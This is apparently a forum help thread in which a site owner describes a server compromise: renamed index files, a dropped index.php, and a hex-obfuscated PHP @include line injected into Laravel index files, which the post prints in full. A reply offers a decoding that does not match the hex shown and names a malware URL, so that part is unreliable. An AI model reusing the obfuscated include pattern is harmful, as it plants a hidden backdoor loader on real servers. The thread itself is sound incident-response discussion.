I got a wrong issue on my server. For example i got a static html website. used well for a couple days. than links got broken. i checked ftp and saw index.html changed to index.html.bak and there was a index.php
This strange files have some encrypted code. Such as this: index.php https://hastebin.com/xepokigeqe.xml
And this: xml62.php https://hastebin.com/edohitogoc.xml
This case brokes my other php web apps. Some of my laravel apps index files got injected with these lines
/*47f70*/
@include "\x2fh\x6fm\x65/\x757\x335\x362\x336\x2f1\x37n\x61p\x6fl\x69p\x69z\x7aa\x2ec\x6fm\x2fa\x73s\x65t\x73/\x69m\x61g\x65s\x2fa\x76a\x74a\x72s\x2ff\x61v\x69c\x6fn\x5f0\x344\x624\x65.\x69c\x6f";
/*47f70*/
I don't know how to solve or how to research this thing. If anyone knows about this, please help me. I'll be glad. thnx
Decrypts to @include "/home/u7356236/bebekti.com/script/revslider/favicon_45717f.ico";
The malware is: http://bebekti.com/script/revslider/favicon_45717f.ico
It is a php file disguised as an icon file and it decrypts to : https://hastebin.com/racohopene.xml
I would change all of your passwords and make sure it is something secure.